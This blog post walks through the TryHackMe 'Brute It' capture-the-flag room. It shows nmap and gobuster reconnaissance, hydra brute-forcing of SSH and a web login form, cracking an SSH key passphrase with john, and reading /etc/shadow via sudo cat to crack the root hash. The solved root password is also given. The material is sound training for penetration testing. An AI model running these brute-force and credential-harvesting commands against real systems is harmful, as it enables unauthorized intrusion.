Challenges: Brute It (TryHackMe)

JebitokJebitok
4 min read

Table of contents

In this box, we walk through a hands-on experience of a basic CTF-style Linux machine, where we explore critical concepts useful for real-world penetration testing and OSCP prep. The focus is on:

  • ๐Ÿ” Reconnaissance using tools like nmap and gobuster

  • ๐Ÿ” Brute-force attacks on both SSH and web login forms using hydra

  • ๐Ÿ”‘ Cracking private key passphrases with john

  • ๐Ÿ› ๏ธ Privilege escalation by analyzing sudo permissions and cracking shadow file hashes

Throughout the room, we sharpen our understanding of attack surfaces exposed via web services, and practice chaining small wins โ€” from login panels to shell access โ€” into full system compromise.

Whether you're a beginner learning the ropes or someone brushing up before an exam, this room will help solidify your offensive security fundamentals.

About this box

In this box you will learn about:

- Brute-force

- Hash cracking

- Privilege escalation

Connect to the TryHackMe network, and deploy the machine.

Answer the questions below

Deploy the machine

Reconnaissance

Before attacking, let's get information about the target

Answer the questions below

Search for open ports using nmap.

nmap -p- -sC -sV IP_Address

  1. How many ports are open?

  2. What version of SSH is running?

  3. What version of Apache is running?

  4. Which Linux distribution is running?

  5. Search for hidden directories on web server.
    What is the hidden directory?

    gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt

take note of user called john, it will be important

gobuster dir -u IP_Address/admin/ -w /usr/share/wordlists/dirb/common.txt

Getting a shell

Find a form to get a shell on SSH.

Answer the questions below

  1. What is the user:password of the admin panel?

    I tried using hydra in this way:

    hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://IP_Address
    hydra -l admin -P /usr/share/wordlists/fasttrack.txt ssh://IP_Address

    hydra -L /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://IP_Address

    that didnโ€™t work went back to the site to try logging in using the username admin and random passwords

    the login form:

After logging in with random password with our given username, admin. Under the Request of the Network tab we see the login form fields user and pass

hydra -l admin -P /usr/share/wordlists/rockyou.txt IP_Address http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid"

  • /admin/index.php โ†’ the login page URL.

  • user=^USER^&pass=^PASS^ โ†’ the exact POST body format, using the input field names from the form. Hydra substitutes ^USER^ and ^PASS^ as it tries each combo.

  • F=Username or password invalid โ†’ tells Hydra what failure message to look for in the response. If it doesn't find this string, it assumes login was successful.

the output

  1. Crack the RSA key you found.
    What is John's RSA Private Key passphrase?

    youโ€™ll find the id_rsa here: http://10.10.107.134/admin/panel/id_rsa. Create a file to past it to

    nano id_rsa

    /opt/john/ssh2john.py id_rsa > hash.txt

    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  2. user.txt

    chmod 600 id_rsa

    ssh -i id_rsa john@IP_Address

    find / -type f -name user.txt 2> /dev/null

  3. Web flag

    youโ€™ll find the web flag here: http://10.10.107.134/admin/panel/id_rsa.

Privilege Escalation

Now, we need to escalate our privileges.

Answer the questions below

Find a form to escalate your privileges.

  1. What is the root's password? football

    sudo /bin/cat /etc/shadow

    echo "$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02." > hash11.txt
    grep -E '^[a-z]{8}$' /usr/share/wordlists/rockyou.txt > 8_letter_words.txt

    hashcat -m 1800 -a 0 hash11.txt 8_letter_words.txt

    john --format=sha512crypt --wordlist=six_letter_words.txt hash6.txt

  1. root.txt

This box reinforced essential skills for attacking Linux systems:

  • ๐ŸŽฏ We started with enumeration using nmap and gobuster, uncovering both open ports and hidden directories.

  • ๐Ÿ”“ We used hydra to brute-force both web login forms and SSH authentication, demonstrating how critical weak credentials can be.

  • ๐Ÿงฉ We learned to convert private SSH keys into a hash format readable by john, and crack the passphrase to gain shell access.

  • ๐Ÿ” For privilege escalation, we explored the power of sudo misconfigurations and cracked a hashed root password using hashcat.

By the end of this room, we captured all the flags โ€” from web to user to root โ€” and gained a better appreciation for how multiple weak points can be exploited to take control of a system.

Keep practicing, stay curious, and always document your learning journey. On to the next challenge! ๐Ÿ’ช๐Ÿ”

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

bruteforcingnmapgobuster#enumerationPrivilege Escalationhashcat

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.